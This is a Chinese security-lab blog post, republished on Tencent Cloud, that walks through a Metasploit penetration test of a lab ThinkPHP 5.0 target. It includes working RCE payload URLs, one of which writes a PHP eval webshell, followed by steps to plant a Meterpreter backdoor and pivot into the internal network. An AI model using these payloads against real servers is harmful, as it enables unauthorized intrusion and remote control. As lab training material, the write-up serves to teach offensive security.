专栏首页Ms08067安全实验室利用Metasploit 打入ThinkPHP内网...

利用Metasploit 打入ThinkPHP内网...

本文作者:dch(Ms08067实验室 SRSP TEAM小组成员)

一、利用Metasploit进行攻击的流程图

图1 Metasploit渗透流程

二、Metasploit渗透攻击

(1)通过msfconsole命令启动Metasploit在这个过程中,系统会主动加载数据库,如图2所示:

图2 启动Metasploit

(2)使用辅助模块进行端口扫描,如下图3所示:

图3 进行扫描

(3)寻找合适的漏洞利用模块并使用,如下图4所示:

图4 加载模块

(4)查看并修改参数,如下图 5所示:

图5 修改参数

(5)利用漏洞 Exploi,如下图6所示:

图6 漏洞利用

三、实施攻击

1、靶机 、攻击机

(1)目标地址 192.168. 222 130

(2)攻击地址 192.168. 238.129

2、用nmap进行端口扫描(通过端口扫描找到其开放的服务,再根据相关的服务查找与之相对应的漏洞进行利用),如图7所示

图7 端口扫描

通过扫描可以看到Target1发现开放了21(ftp)、22(ssh)、80(http )、111(RPC)、888 (http)、3306(Mysql)、8888(http)这些端口服务,且是一个Linux 的操作系统。

3、进入web界面

图8 web界面

打开后发现它是ThinkPHP框架,版本是V5.0,这时候想到它存在一个

RCE(远程命令执行)漏洞,先用POC(利用程序)测试一下

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ,结果如图9所示

图9 进行漏洞测试

4、成功出现了PHPinfo界面,说明该版本是存在漏洞的。用POC写入一句话,写入一句话到cmd.php:

http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php

5、上传后,通过蚁剑进行连接,发现并不能成功连接。发现是$_POST被过滤了,这里可以利用编码(如Base64、URL)后再次上传。

6、用蚁剑进行连接,成功连接。此时已经获取到该主机的shell,可以查看系

统的信息等。如下图10、11所示:

图10 成功获得shell

图11 查看系统信息

7、根据攻击机的IP地址及目标靶机的系统类型生成对应的后门文件 ,如图

12、13所示:

图12 查看攻击机IP

图13 制作后门

8、在kali中配置运行监听模块,如下图14所示:

图14 msf设置监听

9、通过蚁剑将后门文件shell.elf上传到靶机中,并赋予777权限以执行,如

图15、16所示:

图15 上传shell.elf后门文件

图16 赋予777权限执行

10、获得 meterpreter,如图17所示

图17 获得meterpreter

11、查看可用网段,如图18所示

图18 查看可用网段

12、发现两个网段:一个是192.168.2.0/24,另一个是192.168.222.0/24,通过meterpreter对192.168.222.0/24添加第二层的路由,如下图19所示

图19 添加第二层路由

13、添加成功后进行内网扫描,查看内网中存活的主机,如图20所示

图20 查看存活主机

14、发现第二层靶机192.168.222.128,如下图21所示

图21 出现第二层网址

15、在MSF中设置代理

图22 设置代理

图 23

通过设置代理,进行下一步的内网渗透

本文分享自微信公众号 - Ms08067安全实验室(Ms08067_com),作者:徐哥

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • PowerShell5.X与WMI的集成 专题系列分享 第一部分

    众所周知,在windows10以及Windows Server2016的平台当中,PowerShell5.x已经能够去获取到系 统当中大部分的信息,但有...

    Ms08067安全实验室
  • Dns注入

    域名DNS指向的是我们服务器的域名,意味着解析域名时需向DNS服务器查询。通过递归查询可以获取数据库上的信息。要记住整个域名内的节点标签被限制在63个字符长度大...

    Ms08067安全实验室
  • WINHEX之从数据恢复到删盘跑路

    WINHEX是一款用于查看和编辑底层十六进制数据的软件。我们可以利用这个软件修改文件格式数据,从而达到数据恢复的效果。

    Ms08067安全实验室
  • Web安全学习笔记之Openvas配置,使用,报告

    OpenVAS(开放式漏洞评估系统)是一个客户端/服务器架构,它常用来评估目标主机上的漏洞。OpenVAS是Nessus项目的一个分支,它提供的产品是完全地免费...

    Jetpropelledsnake21
  • windows中使用Git上传本地项目到Github的仓库中

    黑泽君
  • 一起学Excel专业开发07:工作表设计原则

    原则1:不同目的的单元格采用特定格式来区分。例如,在上图1中,在视觉上区分了数据输入区、公式区、表头以及外部区域。

    fanjy
  • Excel小技巧24:在单元格中插入特殊字符

    这是怎么实现的呢?其实,这都归功于我们常用的“符号”对话框及字符设置。使用这个对话框,我们可以在单元格中插入特殊字符。

    fanjy
  • awk,真的是一款牛逼的神器!

    产品经理(PM)过来找你要最近某某的数据,而你知道这些数据目前只能通过日志文件去分析,因为我们知道,我们不可能把所有数据都放入db中(这不科学啊!)。每当有这样...

    杰哥的IT之旅
  • 10.8 ps命令

    监控系统状态 ps 查看系统进程 用法:ps aux、ps -elf STAT部分说明 D 不能中断的进程 R run状态的进程 S sleep状态的进程 ...

    运维小白
  • JMeter(连载5)

    电子商务登录模块包括一个发送到“/login_action/”的POST请求,里面包括username、password和csrfmiddleware三个字段。

    小老鼠

扫码关注云+社区

领取腾讯云代金券